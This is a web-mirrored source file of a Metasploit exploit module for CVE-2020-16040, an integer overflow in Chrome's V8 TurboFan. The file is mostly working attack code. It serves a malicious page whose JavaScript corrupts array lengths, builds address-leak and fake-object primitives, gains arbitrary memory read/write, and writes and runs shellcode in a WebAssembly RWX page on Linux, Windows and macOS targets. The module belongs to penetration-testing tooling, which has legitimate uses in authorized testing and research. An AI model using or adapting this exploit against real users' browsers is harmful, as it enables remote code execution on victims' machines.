CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::Remote::HttpServer

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',

17
        'Description' => %q{

18
          This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).

19
          The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan.

20
          It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.

21
          This is abused to gain arbitrary read/write into the isolate region.

22
          Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.

23
          The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.

24
          The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'Rajvardhan Agarwal (r4j)', # exploit

29
        ],

30
        'References' => [

31
          ['CVE', '2020-16040'],

32
          ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],

33
          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],

34
          ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],

35
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],

36
        ],

37
        'Arch' => [ ARCH_X64 ],

38
        'DefaultTarget' => 0,

39
        'Payload' => {

40
          'Space' => 4096

41
        },

42
        'Notes' => {

43
          'Reliability' => [ REPEATABLE_SESSION ],

44
          'SideEffects' => [ IOC_IN_LOGS ],

45
          'Stability' => [CRASH_SERVICE_RESTARTS]

46
        },

47
        'Targets' => [

48
          ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],

49
          ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],

50
          ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],

51
        ],

52
        'DisclosureDate' => '2020-11-19'

53
      )

54
    )

55
  end

56


57
  def on_request_uri(cli, request)

58
    print_status("Sending #{request.uri} to #{request['User-Agent']}")

59
    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')

60
    jscript = <<~JS

61
      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])

62
      var wasm_mod = new WebAssembly.Module(wasm_code);

63
      var wasm_instance = new WebAssembly.Instance(wasm_mod);

64
      var wasm_func = wasm_instance.exports.main;

65


66
      var buf = new ArrayBuffer(8);

67
      var f64_buf = new Float64Array(buf);

68
      var u64_buf = new Uint32Array(buf);

69
      var shellcode = new Uint8Array([#{shellcode}]);

70
      var shellbuf = new ArrayBuffer(shellcode.length);

71
      var dataview = new DataView(shellbuf);

72


73
      function ftoi(val) {

74
        f64_buf[0] = val;

75
        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);

76
      }

77


78
      function itof(val) {

79
        u64_buf[0] = Number(val & 0xffffffffn);

80
        u64_buf[1] = Number(val >> 32n);

81
        return f64_buf[0];

82
      }

83


84
      function foo(a) {

85
        var y = 0x7fffffff;

86


87
        if (a == NaN) y = NaN;

88
        if (a) y = -1;

89


90
        let z = y + 1;

91
        z >>= 31;

92
        z = 0x80000000 - Math.sign(z|1);

93


94
        if(a) z = 0;

95


96
        var arr = new Array(0-Math.sign(z));

97
        arr.shift();

98
        var cor = [1.1, 1.2, 1.3];

99


100
        return [arr, cor];

101
      }

102


103
      try {

104
        for(var i=0;i<0x3000;++i)

105
          foo(true);

106


107
        var x = foo(false);

108
      } catch (e) {

109
        location.reload();

110
      }

111
      var arr = x[0];

112
      var cor = x[1];

113


114
      const idx = 6;

115
      arr[idx+10] = 0x4242;

116


117
      function addrof(k) {

118
        arr[idx+1] = k;

119
        return ftoi(cor[0]) & 0xffffffffn;

120
      }

121


122
      function fakeobj(k) {

123
        cor[0] = itof(k);

124
        return arr[idx+1];

125
      }

126


127
      var float_array_map = ftoi(cor[3]);

128


129
      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];

130
      var fake = fakeobj(addrof(arr2) + 0x20n);

131


132
      function arbread(addr) {

133
        if (addr % 2n == 0) {

134
          addr += 1n;

135
        }

136
        arr2[1] = itof((2n << 32n) + addr - 8n);

137
        return ftoi(fake[0]);

138
      }

139


140
      function arbwrite(addr, val) {

141
        if (addr % 2n == 0) {

142
          addr += 1n;

143
        }

144
        arr2[1] = itof((2n << 32n) + addr - 8n);

145
        fake[0] = itof(BigInt(val));

146
      }

147


148
      function copy_shellcode(addr, shellcode) {

149
        let buf_addr = addrof(shellbuf);

150
        let backing_store_addr = buf_addr + 0x14n;

151
        arbwrite(backing_store_addr, addr);

152


153
        for (let i = 0; i < shellcode.length; i++) {

154
          dataview.setUint8(i, shellcode[i]);

155
        }

156
      }

157


158
      var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);

159
      copy_shellcode(rwx_page_addr, shellcode);

160
      wasm_func();

161
    JS

162


163
    html = <<~HTML

164
      <html>

165
      <head>

166
      <script>

167
      #{jscript}

168
      </script>

169
      </head>

170
      <body>

171
      </body>

172
      </html>

173
    HTML

174
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })

175
  end

176


177
end

178


179